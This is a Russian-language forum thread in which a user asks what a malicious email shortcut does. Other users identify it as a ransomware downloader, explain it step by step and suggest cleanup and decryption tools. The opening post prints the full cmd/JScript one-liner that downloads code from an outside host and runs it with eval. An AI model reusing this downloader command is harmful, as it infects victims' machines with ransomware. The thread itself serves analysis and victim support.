11 ответов в этой теме

[gruzin]

Всех приветствую.

 

Пришел по почте ярлычек в архиве.

Приведу скриншот и текст.

 

 screen.PNG   28,27 КБ   1 Скачано

%windir%\system32\cmd.exe /c cd %TEMP%&echo. 2>s.js&echo var r = new ActiveXObject("Msxml2.ServerXMLHTTP.6.0");r.open("GET","http://download-file-mail.com/src/src",false);r.send^(^);var b = r.responseText;eval^(b^);>s.js&start s.js

Смутно понимаю, что эта шляпа хочет скачать и запустить файл s.js

 

Вопрос к экспертам, что именно происходит, после запуска такого "ярлычка"?

[DarkTwin]

Знаешь что такое "шифровальщик" ?

 

Ну или если легче будет то по версии Kaspersky  это  HEUR:Trojan-Downloader.Script.Generic

[gruzin]

Знаешь что такое "шифровальщик" ?

 

Ну или если легче будет то по версии Kaspersky  это  HEUR:Trojan-Downloader.Script.Generic

 

Не раз сталкивался с шифровальщиками.

Что делает скрипт в данном случае? Я ж не просто так спрашиваю.

 

Хотел я его проверить на вирустотал.ком, да, как идиот, распаковал и указал на него через эту форму

 

Ясен пень, проводничек взял, да и запустил этот код, вместо загрузки ярлыка.

Какой-то подозрительный setup.exe я в процессах убил, сижу и думаю теперь.

 

 screen2.PNG   103,09 КБ   1 Скачано

[DarkTwin]

Строка в ярлыке скачивает js скрипт и запускает его. После чего файлы пользователя превращаются в кашу.

[gruzin]

Строка в ярлыке скачивает js скрипт и запускает его. После чего файлы пользователя превращаются в кашу.

 

Тогда у меня проблемы.

[DarkTwin]

Выключить комп.

Найти флешку или диск с антивирусами.

Запустить с диска\флешки проверку.

Возможно что еще не успел что то критичное "сожрать". 

Да и приличное количество шифровльщиков можно восстановить.

[gruzin]

Выключить комп.

Найти флешку или диск с антивирусами.

Запустить с диска\флешки проверку.

Возможно что еще не успел что то критичное "сожрать". 

Да и приличное количество шифровльщиков можно восстановить.

 

Расшифровать имеешь ввиду? Интересно, как?

 

Что характерно, virustotal этот архив уже видел, но не нашел ничего подозрительного.

 

Как ты файл вытащил?

[DarkTwin]

Расшифровать имеешь ввиду? Интересно, как?

http://antifraud.drw...cryption_trojs/

https://www.esetnod3...trojan_remover/

https://noransom.kaspersky.com/

 

Понятно что не все, но есть шанс.

Что характерно, virustotal этот архив уже видел, но не нашел ничего подозрительного.

Так не архив же, а http://download-file-mail.com/src/src

[gruzin]

Так не архив же, а http://download-file-mail.com/src/src

Вот каким образом на компе появляется тело вируса.
Этот весь текст сохранить файлом, с расширением .js и будет вирус, верно?

[Yarra]

Я бы для таких экспериментов крайне рекомендовал иметь под рукой виртуалку.

Вот каким образом на компе появляется тело вируса.
Этот весь текст сохранить файлом, с расширением .js и будет вирус, верно?

В тобой же приведенном тексте все написано. Я не спец в запросах, но, имхо, вполне очевидно что:
1. открывается код

r.open("GET","http://download-file-mail.com/src/src",false)

2. сохраняется в файл s.js

r.send^(^);var b = r.responseText;eval^(b^);>s.js

3. запускается s.js

start s.js

Профит.

Вообще я даже по удаленке вычищал шифровальщиков. Просто быстро подключался, убивал нужный процесс (шифрование файла все же дело не совсем быстрое) и вычищал автозагрузку в спокойном режиме.
Но вот расшифровать не всегда выходило. Dr.Web на одиного шифровальщика спустя три месяца выдал программу анти-шифр. Для другого - нет. Ну, в прочем, пользователи сами виноваты. Нехер говно всякое запускать. Мозги иметь надо.

[gruzin]

Мозги иметь надо, безусловно.
Спасибо всем за помощь.

[DarkTwin]

https://habrahabr.ru...et/blog/303752/